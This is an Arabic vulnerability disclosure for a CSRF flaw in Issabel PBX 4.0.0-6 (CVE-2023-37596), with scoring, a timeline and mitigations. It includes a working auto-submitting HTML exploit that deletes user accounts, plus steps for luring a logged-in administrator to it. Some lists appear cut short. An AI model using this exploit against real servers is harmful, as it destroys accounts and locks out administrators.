
CVE-2023-37596 هي ثغرة تزوير الطلبات عبر المواقع (CSRF) تم اكتشافها في Issabel PBX الإصدار 4.0.0-6، وهي منصة اتصالات موحدة مفتوحة المصدر واسعة الاستخدام.
الخطورة: عالية | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
تم اكتشاف ثغرة تزوير الطلبات عبر المواقع (CSRF) في Issabel PBX الإصدار 4.0.0-6. لا تطبّق نقطة نهاية إدارة المستخدمين أي حماية من CSRF، مما يسمح لمهاجم عن بُعد غير مصادَق بتجهيز صفحة ويب خبيثة — عند زيارتها من قِبل مسؤول Issabel مصادَق — تحذف أي حساب مستخدم من النظام بصمت. يمكن أن يؤدي الاستغلال المتكرر إلى جعل التطبيق بالكامل غير قابل للوصول عن طريق إزالة جميع المستخدمين الإداريين.
| الحقل | القيمة |
|---|---|
| معرّف CVE | CVE-2023-37596 |
| نوع الثغرة | Cross-Site Request Forgery (CSRF) |
| CWE | CWE-352 |
| المنتج | Issabel PBX |
| الإصدار المتأثر | 4.0.0-6 |
| الصفحة الرئيسية للبائع | https://www.issabel.org/ |
| مستودع البرنامج | https://github.com/IssabelFoundation/issabelPBX |
| تم الاختبار على | Windows |
| تاريخ نشر CVE | 10/07/2023 |
| اكتشفها | Sahil Ojha |
نظرًا لأن Issabel PBX لا يتحقق من مصدر الطلبات التي تغيّر الحالة الموجهة إلى واجهة إدارة المستخدمين، فإن هجوم CSRF ناجحًا يسمح للمهاجم بـ:
| المنتج | الإصدار المتأثر | الحالة |
|---|---|---|
| issabel-pbx | 4.0.0-6 | عرضة للخطر |
يستضيف المهاجم صفحة HTML خبيثة تحتوي على طلب HTTP مُزوَّر يستهدف نقطة نهاية حذف المستخدم في تطبيق Issabel PBX. يتم تشغيل الهجوم تلقائيًا (أو عند النقر على زر) عندما يزور مستخدم مصادَق بالفعل في Issabel الصفحة الخبيثة في نفس المتصفح. نظرًا لأن المتصفح يضمّن تلقائيًا ملفات تعريف ارتباط الجلسة الخاصة بالضحية مع كل طلب، يقبل الخادم طلب الحذف المُزوَّر باعتباره مشروعًا.
لا تتطلب أي امتيازات خاصة من جانب المهاجم — فقط ناقل هندسة اجتماعية (رابط تصيّد، إعلان خبيث، إلخ) لإغراء المسؤول المصادَق لزيارة الصفحة المُجهزة.
الخصائص الرئيسية لهذا الهجوم:
id=1, id=2, …) عن طريق تعديل الحمولة.انتقل إلى صفحة قائمة مستخدمي Issabel PBX وسجّل الدخول ببيانات اعتماد المسؤول:
https://<Issabel-IP>/index.php?menu=userlist


سينشئ Burp Suite صفحة HTML مشابهة للصفحة أدناه. احفظها كملف .html (مثل csrf_exploit.html):
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Auto-submit the form as soon as the page loads
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
ملاحظة: استبدل
<Issabel-IP>بعنوان IP أو اسم مضيف الخادم المستهدف، واضبط قيمةidلاستهداف حساب مستخدم مختلف.
أرسل ملف csrf_exploit.html (أو رابطًا إلى مكان استضافته) إلى مستخدم مسجّل الدخول حاليًا في Issabel PBX. عندما يفتح الضحية الصفحة، يتم إرسال النموذج تلقائيًا ويتم حذف المستخدم المستهدف دون أي مطالبة تأكيد.


يجب على البائع و/أو مسؤولي النظام تطبيق الدفاعات التالية لمعالجة هذه الثغرة:
تنفيذ رموز CSRF — إنشاء رمز عشوائي تشفيريًا، لكل جلسة (أو لكل طلب)، والتحقق منه على جانب الخادم لكل طلب يغيّر الحالة. يجب رفض الطلبات التي لا تحمل رمزًا صالحًا.
خاصية SameSite لملفات تعريف الارتباط — اضبط خاصية SameSite لملف تعريف ارتباط الجلسة على Strict أو Lax لمنع الطلبات عبر الأصول من حمل ملف تعريف ارتباط الجلسة في معظم المتصفحات.
التحقق من ترويسة Origin / Referer — على جانب الخادم، ارفض أي طلب يغيّر الحالة لا تطابق ترويسة Origin أو Referer الخاصة به نطاق التطبيق نفسه.
طلب إعادة المصادقة للإجراءات التدميرية — مطالبة المستخدم بإعادة إدخال كلمة المرور قبل معالجة الإجراءات غير القابلة للتراجع مثل حذف حسابات المستخدمين.
تطبيق مبدأ الامتياز الأقل — ضمان أن المستخدمين الذين لديهم دور مسؤول صريح فقط يمكنهم الوصول إلى وظيفة حذف المستخدمين، مما يقلل من نطاق تأثير الهجوم الناجح.
حتى يتوفر تصحيح من البائع، يُنصح المسؤولون بـ:
| التاريخ | الحدث |
|---|---|
| 10/07/2023 | تم اكتشاف الثغرة والإبلاغ عنها |
| 10/07/2023 | تم تعيين CVE-2023-37596 |
Sahil Ojha
إخلاء مسؤولية: تم نشر هذا المستودع للأغراض التعليمية والإفصاح المسؤول فقط. يجب عدم استخدام المعلومات الواردة هنا لمهاجمة الأنظمة دون إذن كتابي صريح من مالك النظام. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المعلومات.